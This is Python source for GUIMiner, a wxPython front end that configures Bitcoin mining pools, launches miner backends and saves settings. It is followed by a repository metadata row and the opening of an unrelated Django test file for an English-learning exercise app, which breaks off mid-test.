_("Your miner username (not your account username).\nExample: Kiv.GPU"))
add_tooltip(self.txt_pass,
_("Your miner password (not your account password)."))
def layout_eligius(self):
"""Eligius doesn't require registration or a password.
The username is just their receiving address.
"""
invisible = [self.txt_pass, self.txt_host, self.txt_port,
self.withdraw,
self.pass_lbl, self.host_lbl, self.port_lbl]
self.set_widgets_visible(invisible, False)
self.set_widgets_visible([self.extra_info], True)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.inner_sizer.Add(self.user_lbl, (row + 1, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_username, (row + 1, 1), span=(1, 3), flag=wx.EXPAND)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.inner_sizer.Add(self.extra_info, (row + 5, 0), span=(1, 4), flag=wx.ALIGN_CENTER_HORIZONTAL)
self.layout_finish()
self.extra_info.SetLabel(_("No registration is required - just enter an address and press Start."))
self.txt_pass.SetValue('x')
self.user_lbl.SetLabel(_("Address:"))
add_tooltip(self.txt_username,
_("Your receiving address for Bitcoins.\nE.g.: 1JMfKKJqtkDPbRRsFSLjX1Cs2dqmjKiwj8"))
def layout_btcguild(self):
"""BTC Guild has the same layout as slush for now."""
self.layout_slush()
def layout_bitcoinserver(self):
"""Bitcoin-Server.de has the same layout as slush for now."""
self.layout_slush()
def layout_btcmine(self):
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.withdraw, self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("Your miner username. \nExample: kiv123@kiv123"))
add_tooltip(self.txt_pass,
_("Your miner password (not your account password)."))
def layout_deepbit(self):
"""Deepbit uses an email address for a username."""
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("The e-mail address you registered with."))
self.user_lbl.SetLabel(_("Email:"))
def layout_btcmp(self):
"""Deepbit uses an email address for a username."""
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("Your worker name. Is something in the form of username.workername"))
self.user_lbl.SetLabel(_("Workername:"))
def layout_x8s(self):
"""x8s has the same layout as slush for now."""
self.layout_slush()
# End server specific code
##########################
class GUIMiner(wx.Frame):
def __init__(self, *args, **kwds):
wx.Frame.__init__(self, *args, **kwds)
style = fnb.FNB_X_ON_TAB | fnb.FNB_FF2 | fnb.FNB_HIDE_ON_SINGLE_TAB
self.nb = fnb.FlatNotebook(self, -1, style=style)
# Set up notebook context menu
notebook_menu = wx.Menu()
ID_RENAME, ID_DUPLICATE = wx.NewId(), wx.NewId()
notebook_menu.Append(ID_RENAME, _("&Rename..."), _("Rename this miner"))
        notebook_menu.Append(ID_DUPLICATE, _("&Duplicate..."), _("Duplicate this miner"))
self.nb.SetRightClickMenu(notebook_menu)
self.Bind(wx.EVT_MENU, self.rename_miner, id=ID_RENAME)
self.Bind(wx.EVT_MENU, self.duplicate_miner, id=ID_DUPLICATE)
self.console_panel = None
self.summary_panel = None
        # Servers and defaults are required; it's a fatal error not to have
# them.
server_config_path = os.path.join(get_module_path(), 'servers.ini')
with open(server_config_path) as f:
data = json.load(f)
self.servers = data.get('servers')
defaults_config_path = os.path.join(get_module_path(), 'defaults.ini')
with open(defaults_config_path) as f:
self.defaults = json.load(f)
self.parse_config()
self.do_show_opencl_warning = self.config_data.get('show_opencl_warning', True)
self.console_max_lines = self.config_data.get('console_max_lines', 5000)
ID_NEW_EXTERNAL, ID_NEW_PHOENIX, ID_NEW_CGMINER, ID_NEW_CUDA, ID_NEW_UFASOFT = wx.NewId(), wx.NewId(), wx.NewId(), wx.NewId(), wx.NewId()
self.menubar = wx.MenuBar()
file_menu = wx.Menu()
new_menu = wx.Menu()
new_menu.Append(wx.ID_NEW, _("&New OpenCL miner..."), _("Create a new OpenCL miner (default for ATI cards)"), wx.ITEM_NORMAL)
#new_menu.Append(ID_NEW_PHOENIX, _("New Phoenix miner..."), _("Create a new Phoenix miner (for some ATI cards)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_CGMINER, _("New CG miner..."), _("Create a new CGMiner (for some ATI cards)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_CUDA, _("New CUDA miner..."), _("Create a new CUDA miner (for NVIDIA cards)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_UFASOFT, _("New Ufasoft CPU miner..."), _("Create a new Ufasoft miner (for CPUs)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_EXTERNAL, _("New &other miner..."), _("Create a new custom miner (requires external program)"), wx.ITEM_NORMAL)
file_menu.AppendMenu(wx.NewId(), _('&New miner'), new_menu)
file_menu.Append(wx.ID_SAVE, _("&Save settings"), _("Save your settings"), wx.ITEM_NORMAL)
file_menu.Append(wx.ID_OPEN, _("&Load settings"), _("Load stored settings"), wx.ITEM_NORMAL)
file_menu.Append(wx.ID_EXIT, _("Quit"), STR_QUIT, wx.ITEM_NORMAL)
self.menubar.Append(file_menu, _("&File"))
ID_SUMMARY, ID_CONSOLE = wx.NewId(), wx.NewId()
view_menu = wx.Menu()
view_menu.Append(ID_SUMMARY, _("Show summary"), _("Show summary of all miners"), wx.ITEM_NORMAL)
view_menu.Append(ID_CONSOLE, _("Show console"), _("Show console logs"), wx.ITEM_NORMAL)
self.menubar.Append(view_menu, _("&View"))
ID_SOLO, ID_PATHS, ID_BLOCKCHAIN_PATH, ID_LAUNCH = wx.NewId(), wx.NewId(), wx.NewId(), wx.NewId()
solo_menu = wx.Menu()
solo_menu.Append(ID_SOLO, _("&Create solo password..."), _("Configure a user/pass for solo mining"), wx.ITEM_NORMAL)
solo_menu.Append(ID_PATHS, _("&Set Bitcoin client path..."), _("Set the location of the official Bitcoin client"), wx.ITEM_NORMAL)
solo_menu.Append(ID_BLOCKCHAIN_PATH, _("&Set Bitcoin data directory..."), _("Set the location of the bitcoin data directory containing the blockchain and wallet"), wx.ITEM_NORMAL)
solo_menu.Append(ID_LAUNCH, _("&Launch Bitcoin client as server"), _("Launch the official Bitcoin client as a server for solo mining"), wx.ITEM_NORMAL)
self.menubar.Append(solo_menu, _("&Solo utilities"))
ID_START_MINIMIZED = wx.NewId()
self.options_menu = wx.Menu()
self.start_minimized_chk = self.options_menu.Append(ID_START_MINIMIZED, _("Start &minimized"), _("Start the GUI minimized to the tray."), wx.ITEM_CHECK)
self.options_menu.Check(ID_START_MINIMIZED, self.config_data.get('start_minimized', False))
self.menubar.Append(self.options_menu, _("&Options"))
ID_CHANGE_LANGUAGE = wx.NewId()
lang_menu = wx.Menu()
lang_menu.Append(ID_CHANGE_LANGUAGE, _("&Change language..."), "", wx.ITEM_NORMAL)
self.menubar.Append(lang_menu, _("Language"))
ID_DONATE_SMALL = wx.NewId()
donate_menu = wx.Menu()
donate_menu.Append(ID_DONATE_SMALL, _("&Donate..."), _("Donate Bitcoins to support GUIMiner development"))
self.menubar.Append(donate_menu, _("&Donate"))
help_menu = wx.Menu()
help_menu.Append(wx.ID_ABOUT, _("&About..."), STR_ABOUT, wx.ITEM_NORMAL)
self.menubar.Append(help_menu, _("&Help"))
self.SetMenuBar(self.menubar)
self.statusbar = self.CreateStatusBar(2, 0)
try:
self.bitcoin_executable = os.path.join(os.getenv("PROGRAMFILES"), "Bitcoin", "bitcoin-qt.exe")
        except (TypeError, AttributeError):  # PROGRAMFILES unset (not Windows)
self.bitcoin_executable = "" # TODO: where would Bitcoin probably be on Linux/Mac?
try:
self.blockchain_directory = os.path.join(os.getenv("APPDATA"), "Bitcoin")
        except (TypeError, AttributeError):  # APPDATA unset (not Windows)
self.blockchain_directory = ""
try:
self.tbicon = GUIMinerTaskBarIcon(self)
        except Exception:
logging.error(_("Failed to load taskbar icon; continuing."))
self.set_properties()
try:
self.devices = get_opencl_devices()
        except Exception:
self.devices = []
file_menu.Enable(wx.ID_NEW, False)
            file_menu.SetHelpString(wx.ID_NEW, _("OpenCL not found - can't add an OpenCL miner"))
if self.do_show_opencl_warning:
dialog = OpenCLWarningDialog(self)
dialog.ShowModal()
self.do_show_opencl_warning = not dialog.is_box_checked()
self.Bind(wx.EVT_MENU, self.name_new_profile, id=wx.ID_NEW)
#self.Bind(wx.EVT_MENU, self.new_phoenix_profile, id=ID_NEW_PHOENIX)
self.Bind(wx.EVT_MENU, self.new_cgminer_profile, id=ID_NEW_CGMINER)
self.Bind(wx.EVT_MENU, self.new_ufasoft_profile, id=ID_NEW_UFASOFT)
self.Bind(wx.EVT_MENU, self.new_cuda_profile, id=ID_NEW_CUDA)
self.Bind(wx.EVT_MENU, self.new_external_profile, id=ID_NEW_EXTERNAL)
self.Bind(wx.EVT_MENU, self.save_config, id=wx.ID_SAVE)
self.Bind(wx.EVT_MENU, self.load_config, id=wx.ID_OPEN)
self.Bind(wx.EVT_MENU, self.on_menu_exit, id=wx.ID_EXIT)
self.Bind(wx.EVT_MENU, self.set_official_client_path, id=ID_PATHS)
self.Bind(wx.EVT_MENU, self.set_blockchain_directory, id=ID_BLOCKCHAIN_PATH)
self.Bind(wx.EVT_MENU, self.show_console, id=ID_CONSOLE)
self.Bind(wx.EVT_MENU, self.show_summary, id=ID_SUMMARY)
self.Bind(wx.EVT_MENU, self.show_about_dialog, id=wx.ID_ABOUT)
self.Bind(wx.EVT_MENU, self.create_solo_password, id=ID_SOLO)
self.Bind(wx.EVT_MENU, self.launch_solo_server, id=ID_LAUNCH)
self.Bind(wx.EVT_MENU, self.on_change_language, id=ID_CHANGE_LANGUAGE)
self.Bind(wx.EVT_MENU, self.on_donate, id=ID_DONATE_SMALL)
self.Bind(wx.EVT_CLOSE, self.on_close)
self.Bind(wx.EVT_ICONIZE, self.on_iconize)
self.Bind(fnb.EVT_FLATNOTEBOOK_PAGE_CLOSING, self.on_page_closing)
self.Bind(fnb.EVT_FLATNOTEBOOK_PAGE_CLOSED, self.on_page_closed)
self.Bind(fnb.EVT_FLATNOTEBOOK_PAGE_CHANGED, self.on_page_changed)
self.load_config()
self.do_layout()
if not self.start_minimized_chk.IsChecked():
self.Show()
def on_iconize(self, event):
if event.Iconized() and sys.platform == 'win32':
self.Hide() # On minimize, hide from taskbar.
else:
self.Show()
def set_properties(self):
self.SetIcons(get_icon_bundle())
self.SetTitle(_("GUIMiner - v%s") % __version__)
self.statusbar.SetStatusWidths([-1, 125])
statusbar_fields = ["", STR_NOT_STARTED]
for i in range(len(statusbar_fields)):
self.statusbar.SetStatusText(statusbar_fields[i], i)
def do_layout(self):
self.vertical_sizer = wx.BoxSizer(wx.VERTICAL)
self.vertical_sizer.Add(self.nb, 1, wx.EXPAND, 20)
self.SetSizer(self.vertical_sizer)
self.vertical_sizer.SetSizeHints(self)
self.SetSizerAndFit(self.vertical_sizer)
self.Layout()
@property
def profile_panels(self):
"""Return a list of currently available MinerTab."""
pages = [self.nb.GetPage(i) for i in range(self.nb.GetPageCount())]
return [p for p in pages if
p != self.console_panel and p != self.summary_panel]
def add_profile(self, data={}):
"""Add a new MinerTab to the list of tabs."""
panel = MinerTab(self.nb, -1, self.devices, self.servers,
self.defaults, self.statusbar, data)
self.nb.AddPage(panel, panel.name)
# The newly created profile should have focus.
self.nb.EnsureVisible(self.nb.GetPageCount() - 1)
if self.summary_panel is not None:
self.summary_panel.add_miners_to_grid() # Show new entry on summary
return panel
def message(self, *args, **kwargs):
"""Utility method to show a message dialog and return their choice."""
dialog = wx.MessageDialog(self, *args, **kwargs)
retval = dialog.ShowModal()
dialog.Destroy()
return retval
def name_new_profile(self, event=None, extra_profile_data={}):
"""Prompt for the new miner's name."""
dialog = wx.TextEntryDialog(self, _("Name this miner:"), _("New miner"))
if dialog.ShowModal() == wx.ID_OK:
name = dialog.GetValue().strip()
if not name: name = _("Untitled")
data = extra_profile_data.copy()
data['name'] = name
self.add_profile(data)
def new_external_profile(self, event):
"""Prompt for an external miner path, then create a miner.
On Windows we validate against legal miners; on Linux they can pick
whatever they want.
"""
wildcard = _('External miner (*.exe)|*.exe|(*.py)|*.py') if sys.platform == 'win32' else '*.*'
dialog = wx.FileDialog(self,
_("Select external miner:"),
defaultDir=os.path.join(get_module_path(), 'miners'),
defaultFile="",
wildcard=wildcard,
style=wx.OPEN)
if dialog.ShowModal() != wx.ID_OK:
return
if sys.platform == 'win32' and dialog.GetFilename() not in SUPPORTED_BACKENDS:
self.message(
_("Unsupported external miner %(filename)s. Supported are: %(supported)s") % \
dict(filename=dialog.GetFilename(), supported='\n'.join(SUPPORTED_BACKENDS)),
_("Miner not supported"), wx.OK | wx.ICON_ERROR)
return
path = os.path.join(dialog.GetDirectory(), dialog.GetFilename())
dialog.Destroy()
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_phoenix_profile(self, event):
"""Create a new miner using the Phoenix OpenCL miner backend."""
path = os.path.join(get_module_path(), 'phoenix.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_cgminer_profile(self, event):
"""Create a new miner using the Cgminer OpenCL miner backend."""
path = os.path.join(get_module_path(), 'cgminer.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_ufasoft_profile(self, event):
"""Create a new miner using the Ufasoft CPU miner backend."""
path = os.path.join(get_module_path(), 'miners', 'ufasoft', 'bitcoin-miner.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_cuda_profile(self, event):
"""Create a new miner using the CUDA GPU miner backend."""
path = os.path.join(get_module_path(), 'miners', 'puddinpop', 'rpcminer-cuda.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def get_storage_location(self):
"""Get the folder and filename to store our JSON config."""
if sys.platform == 'win32':
folder = os.path.join(os.environ['AppData'], 'poclbm')
config_filename = os.path.join(folder, 'poclbm.ini')
else: # Assume linux? TODO test
folder = os.environ['HOME']
config_filename = os.path.join(folder, '.poclbm')
return folder, config_filename
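    # For example, this resolves to %AppData%\poclbm\poclbm.ini on Windows
    # and to $HOME/.poclbm elsewhere.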
def on_close(self, event):
"""Minimize to tray if they click "close" but exit otherwise.
On closing, stop any miners that are currently working.
"""
if event.CanVeto():
self.Hide()
event.Veto()
else:
if any(p.is_modified for p in self.profile_panels):
dialog = wx.MessageDialog(self, _('Do you want to save changes?'), _('Save'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION)
retval = dialog.ShowModal()
dialog.Destroy()
if retval == wx.ID_YES:
self.save_config()
if self.console_panel is not None:
self.console_panel.on_close()
if self.summary_panel is not None:
self.summary_panel.on_close()
for p in self.profile_panels:
p.on_close()
if self.tbicon is not None:
self.tbicon.RemoveIcon()
self.tbicon.timer.Stop()
self.tbicon.Destroy()
event.Skip()
def save_config(self, event=None):
"""Save the current miner profiles to our config file in JSON format."""
folder, config_filename = self.get_storage_location()
mkdir_p(folder)
profile_data = [p.get_data() for p in self.profile_panels]
config_data = dict(show_console=self.is_console_visible(),
show_summary=self.is_summary_visible(),
profiles=profile_data,
bitcoin_executable=self.bitcoin_executable,
blockchain_directory=self.blockchain_directory,
show_opencl_warning=self.do_show_opencl_warning,
start_minimized=self.start_minimized_chk.IsChecked(),
console_max_lines=self.console_max_lines,
window_position=list(self.GetRect()))
logger.debug(_('Saving: ') + json.dumps(config_data))
try:
with open(config_filename, 'w') as f:
json.dump(config_data, f, indent=4)
except IOError:
self.message(
_("Couldn't write save file %s.\nCheck the location is writable.") % config_filename,
_("Save unsuccessful"), wx.OK | wx.ICON_ERROR)
else:
self.message(_("Profiles saved OK to %s.") % config_filename,
_("Save successful"), wx.OK | wx.ICON_INFORMATION)
for p in self.profile_panels:
p.on_saved()
def parse_config(self):
"""Set self.config_data to a dictionary of config values."""
self.config_data = {}
try:
config_filename = self.get_storage_location()[1]
if os.path.exists(config_filename):
with open(config_filename) as f:
self.config_data.update(json.load(f))
logger.debug(_('Loaded: %s') % json.dumps(self.config_data))
except ValueError:
self.message(
_("Your settings saved at:\n %s\nare corrupt or could not be read.\nDeleting this file or saving over it may solve the problem." % config_filename),
_("Error"), wx.ICON_ERROR)
def load_config(self, event=None):
"""Load JSON profile info from the config file."""
self.parse_config()
config_data = self.config_data
executable = config_data.get('bitcoin_executable', None)
if executable is not None:
self.bitcoin_executable = executable
blockchain_directory = config_data.get('blockchain_directory', None)
if blockchain_directory is not None:
self.blockchain_directory = blockchain_directory
# Shut down any existing miners before they get clobbered
        if any(p.is_mining for p in self.profile_panels):
result = self.message(
_("Loading profiles will stop any currently running miners. Continue?"),
_("Load profile"), wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)
if result == wx.ID_NO:
return
for p in reversed(self.profile_panels):
p.on_close()
self.nb.DeletePage(self.nb.GetPageIndex(p))
# If present, summary should be the leftmost tab on startup.
if config_data.get('show_summary', False):
self.show_summary()
profile_data = config_data.get('profiles', [])
for d in profile_data:
self.add_profile(d)
        if not profile_data:
self.add_profile() # Create a default one using defaults.ini
if config_data.get('show_console', False):
self.show_console()
window_position = config_data.get('window_position')
if window_position:
self.SetRect(window_position)
for p in self.profile_panels:
if p.autostart:
p.start_mining()
def set_official_client_path(self, event):
"""Set the path to the official Bitcoin client."""
wildcard = "*.exe" if sys.platform == 'win32' else '*.*'
dialog = wx.FileDialog(self,
_("Select path to Bitcoin.exe"),
defaultFile="bitcoin-qt.exe",
wildcard=wildcard,
style=wx.OPEN)
if dialog.ShowModal() == wx.ID_OK:
path = os.path.join(dialog.GetDirectory(), dialog.GetFilename())
if os.path.exists(path):
self.bitcoin_executable = path
dialog.Destroy()
def set_blockchain_directory(self, event):
"""Set the path to the blockchain data directory."""
defaultPath = os.path.join(os.getenv("APPDATA"), "Bitcoin")
dialog = wx.DirDialog(self,
_("Select path to blockchain"),
defaultPath=defaultPath,
style=wx.DD_DIR_MUST_EXIST)
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
if os.path.exists(path):
self.blockchain_directory = path
dialog.Destroy()
def show_about_dialog(self, event):
"""Show the 'about' dialog."""
dialog = AboutGuiminer(self, -1, _('About'))
dialog.ShowModal()
dialog.Destroy()
def on_page_closing(self, event):
"""Handle a tab closing event.
If they are closing a special panel, we have to shut it down.
If the tab has a miner running in it, we have to stop the miner
before letting the tab be removed.
"""
p = self.nb.GetPage(event.GetSelection())
if p == self.console_panel:
self.console_panel.on_close()
self.console_panel = None
event.Skip()
return
if p == self.summary_panel:
self.summary_panel.on_close()
self.summary_panel = None
event.Skip()
return
if p.is_mining:
result = self.message(
_("Closing this miner will stop it. Continue?"),
_("Close miner"),
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)
if result == wx.ID_NO:
event.Veto()
return
p.on_close()
event.Skip() # OK to close the tab now
def on_page_closed(self, event):
if self.summary_panel is not None:
self.summary_panel.add_miners_to_grid() # Remove miner summary
def on_page_changed(self, event):
"""Handle a tab change event.
Ensures the status bar shows the status of the tab that has focus.
"""
p = self.nb.GetPage(event.GetSelection())
p.on_focus()
def launch_solo_server(self, event):
"""Launch the official bitcoin client in server mode.
This allows poclbm to connect to it for mining solo.
"""
if self.blockchain_directory and os.path.exists(self.blockchain_directory):
datadir = " -datadir=\"%s\"" % self.blockchain_directory
else:
datadir = ""
try:
subprocess.Popen(self.bitcoin_executable + " -server" + datadir)
except OSError:
self.message(
_("Couldn't find Bitcoin at %s. Is your path set correctly?") % self.bitcoin_executable,
_("Launch failed"), wx.ICON_ERROR | wx.OK)
return
self.message(
_("The Bitcoin client will now launch in server mode.\nOnce it connects to the network and downloads the block chain, you can start a miner in 'solo' mode."),
_("Launched ok."),
wx.OK)
def create_solo_password(self, event):
"""Prompt the user for login credentials to the bitcoin client.
These are required to connect to the client over JSON-RPC and are
stored in 'bitcoin.conf'.
"""
if sys.platform == 'win32':
filename = os.path.join(os.getenv("APPDATA"), "Bitcoin", "bitcoin.conf")
else: # Assume Linux for now TODO test
filename = os.path.join(os.getenv('HOME'), ".bitcoin")
if os.path.exists(filename):
result = self.message(
_("%s already exists. Overwrite?") % filename,
_("bitcoin.conf already exists."),
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)
if result == wx.ID_NO:
return
dialog = SoloPasswordRequest(self, _('Enter password'))
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_CANCEL:
return
with open(filename, "w") as f:
f.write('\nrpcuser=%s\nrpcpassword=%s\nrpcallowip=*' % dialog.get_value())
self.message(_("Wrote bitcoin config ok."), _("Success"), wx.OK)
def is_console_visible(self):
"""Return True if the console is visible."""
return self.nb.GetPageIndex(self.console_panel) != -1
def show_console(self, event=None):
"""Show the console log in its own tab."""
if self.is_console_visible():
return # Console already shown
self.console_panel = ConsolePanel(self, self.console_max_lines)
self.nb.AddPage(self.console_panel, _("Console"))
self.nb.EnsureVisible(self.nb.GetPageCount() - 1)
def is_summary_visible(self):
"""Return True if the summary is visible."""
return self.nb.GetPageIndex(self.summary_panel) != -1
def show_summary(self, event=None):
"""Show the summary window in its own tab."""
if self.is_summary_visible():
return
self.summary_panel = SummaryPanel(self)
self.nb.AddPage(self.summary_panel, _("Summary"))
index = self.nb.GetPageIndex(self.summary_panel)
self.nb.SetSelection(index)
def on_menu_exit(self, event):
self.Close(force=True)
def rename_miner(self, event):
"""Change the name of a miner as displayed on the tab."""
p = self.nb.GetPage(self.nb.GetSelection())
if p not in self.profile_panels:
return
dialog = wx.TextEntryDialog(self, _("Rename to:"), _("Rename miner"))
if dialog.ShowModal() == wx.ID_OK:
p.set_name(dialog.GetValue().strip())
def duplicate_miner(self, event):
"""Duplicate the current miner to another miner."""
p = self.nb.GetPage(self.nb.GetSelection())
if p not in self.profile_panels:
return
self.name_new_profile(event=None, extra_profile_data=p.get_data())
def on_change_language(self, event):
dialog = ChangeLanguageDialog(self, _('Change language'), language)
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_CANCEL:
return
language_name = dialog.get_value()
update_language(LANGUAGES[language_name])
save_language()
def on_donate(self, event):
dialog = DonateDialog(self, -1, _('Donate'))
dialog.ShowModal()
dialog.Destroy()
class DonateDialog(wx.Dialog):
"""About dialog for the app with a donation address."""
DONATE_TEXT = "If this software helped you, please consider contributing to its development." \
"\nSend donations to: %(address)s"
def __init__(self, parent, id, title):
wx.Dialog.__init__(self, parent, id, title)
vbox = wx.BoxSizer(wx.VERTICAL)
text = DonateDialog.DONATE_TEXT % dict(address=DONATION_ADDRESS)
self.about_text = wx.StaticText(self, -1, text)
self.copy_btn = wx.Button(self, -1, _("Copy address to clipboard"))
vbox.Add(self.about_text, 0, wx.ALL, 10)
vbox.Add(self.copy_btn, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10)
self.SetSizerAndFit(vbox)
self.copy_btn.Bind(wx.EVT_BUTTON, self.on_copy)
def on_copy(self, event):
"""Copy the donation address to the clipboard."""
if wx.TheClipboard.Open():
data = wx.TextDataObject()
data.SetText(DONATION_ADDRESS)
wx.TheClipboard.SetData(data)
wx.TheClipboard.Close()
class ChangeLanguageDialog(wx.Dialog):
"""Dialog prompting the user to change languages."""
def __init__(self, parent, title, current_language):
style = wx.DEFAULT_DIALOG_STYLE
vbox = wx.BoxSizer(wx.VERTICAL)
wx.Dialog.__init__(self, parent, -1, title, style=style)
self.lbl = wx.StaticText(self, -1,
_("Choose language (requires restart to take full effect)"))
vbox.Add(self.lbl, 0, wx.ALL, 10)
self.language_choices = wx.ComboBox(self, -1,
choices=sorted(LANGUAGES.keys()),
style=wx.CB_READONLY)
self.language_choices.SetStringSelection(LANGUAGES_REVERSE[current_language])
vbox.Add(self.language_choices, 0, wx.ALL, 10)
buttons = self.CreateButtonSizer(wx.OK | wx.CANCEL)
vbox.Add(buttons, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10)
self.SetSizerAndFit(vbox)
def get_value(self):
return self.language_choices.GetStringSelection()
class SoloPasswordRequest(wx.Dialog):
"""Dialog prompting user for login credentials for solo mining."""
def __init__(self, parent, title):
style = wx.DEFAULT_DIALOG_STYLE
vbox = wx.BoxSizer(wx.VERTICAL)
wx.Dialog.__init__(self, parent, -1, title, style=style)
self.user_lbl = wx.StaticText(self, -1, STR_USERNAME)
self.txt_username = wx.TextCtrl(self, -1, "")
self.pass_lbl = wx.StaticText(self, -1, STR_PASSWORD)
self.txt_pass = wx.TextCtrl(self, -1, "", style=wx.TE_PASSWORD)
grid_sizer_1 = wx.FlexGridSizer(2, 2, 5, 5)
grid_sizer_1.Add(self.user_lbl, 0, wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL, 0)
grid_sizer_1.Add(self.txt_username, 0, wx.EXPAND, 0)
grid_sizer_1.Add(self.pass_lbl, 0, wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL, 0)
grid_sizer_1.Add(self.txt_pass, 0, wx.EXPAND, 0)
buttons = self.CreateButtonSizer(wx.OK | wx.CANCEL)
        vbox.Add(grid_sizer_1, 0, wx.EXPAND | wx.ALL, 10)
vbox.Add(buttons)
self.SetSizerAndFit(vbox)
def get_value(self):
"""Return the (username, password) supplied by the user."""
return self.txt_username.GetValue(), self.txt_pass.GetValue()
class BalanceAuthRequest(wx.Dialog):
"""Dialog prompting user for an auth token to refresh their balance."""
instructions = \
_("""Click the link below to log in to the pool and get a special token.
This token lets you securely check your balance.
To remember this token for the future, save your miner settings.""")
def __init__(self, parent, url):
style = wx.DEFAULT_DIALOG_STYLE
vbox = wx.BoxSizer(wx.VERTICAL)
wx.Dialog.__init__(self, parent, -1, STR_REFRESH_BALANCE, style=style)
self.instructions = wx.StaticText(self, -1, BalanceAuthRequest.instructions)
self.website = hyperlink.HyperLinkCtrl(self, -1, url)
self.txt_token = wx.TextCtrl(self, -1, _("(Paste token here)"))
buttons = self.CreateButtonSizer(wx.OK | wx.CANCEL)
vbox.AddMany([
(self.instructions, 0, wx.ALL, 10),
(self.website, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10),
(self.txt_token, 0, wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 10),
(buttons, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10)
])
self.SetSizerAndFit(vbox)
def get_value(self):
"""Return the auth token supplied by the user."""
return self.txt_token.GetValue()
class AboutGuiminer(wx.Dialog):
"""About dialog for the app with a donation address."""
def __init__(self, parent, id, title):
wx.Dialog.__init__(self, parent, id, title)
vbox = wx.BoxSizer(wx.VERTICAL)
text = ABOUT_TEXT % dict(version=__version__,
address=DONATION_ADDRESS)
self.about_text = wx.StaticText(self, -1, text)
self.copy_btn = wx.Button(self, -1, _("Copy address to clipboard"))
vbox.Add(self.about_text)
vbox.Add(self.copy_btn, 0, wx.ALIGN_BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 0)
self.SetSizerAndFit(vbox)
self.copy_btn.Bind(wx.EVT_BUTTON, self.on_copy)
def on_copy(self, event):
"""Copy the donation address to the clipboard."""
if wx.TheClipboard.Open():
data = wx.TextDataObject()
data.SetText(DONATION_ADDRESS)
wx.TheClipboard.SetData(data)
wx.TheClipboard.Close()
class OpenCLWarningDialog(wx.Dialog):
"""Warning dialog when a user does not have OpenCL installed."""
def __init__(self, parent):
wx.Dialog.__init__(self, parent, -1, _("No OpenCL devices found."))
vbox = wx.BoxSizer(wx.VERTICAL)
self.message = wx.StaticText(self, -1,
_("""No OpenCL devices were found.
If you only want to mine using CPU or CUDA, you can ignore this message.
If you want to mine on ATI graphics cards, you may need to install the ATI Stream
SDK, or your GPU may not support OpenCL."""))
vbox.Add(self.message, 0, wx.ALL, 10)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.no_show_chk = wx.CheckBox(self, -1)
hbox.Add(self.no_show_chk)
self.no_show_txt = wx.StaticText(self, -1, _("Don't show this message again"))
hbox.Add((5, 0))
hbox.Add(self.no_show_txt)
vbox.Add(hbox, 0, wx.ALL, 10)
buttons = self.CreateButtonSizer(wx.OK)
vbox.Add(buttons, 0, wx.ALIGN_BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 0)
self.SetSizerAndFit(vbox)
def is_box_checked(self):
return self.no_show_chk.GetValue()
def run():
try:
frame_1 = GUIMiner(None, -1, "")
app.SetTopWindow(frame_1)
app.MainLoop()
except:
logging.exception("Exception:")
raise
if __name__ == "__main__":
run()
| gpl-3.0 | 6,675,025,466,027,185,000 | 39.738641 | 187 | 0.587888 | false |
Datastreamx/learn-english | learn_english/exercises/test_gerund.py | 1 | 1703 | from django.test import TestCase
from . import models
from django.test import Client
# All answers are already stored in lowercase.
class GerundTestCase(TestCase):
def setUp(self):
self.client = Client()
models.OpenQuestion.objects.create(category="CC" , question="This is a test question rush b", answer="cyka")
models.OpenQuestion.objects.create(category="CC" , question="This is also a test question", answer="noway")
models.FilledOpenQuestion.objects.create(category="CC", question="This is a test question rush b", answer="cyka")
models.FilledOpenQuestion.objects.create(username="ct", question="This is also a test question", answer="watu")
def test_store_questions(self):
"""Test relevant models"""
test_question = models.OpenQuestion.objects.get(question="This is a test question rush b")
filled_test_question = models.FilledOpenQuestion.objects.get(question="This is a test question rush b")
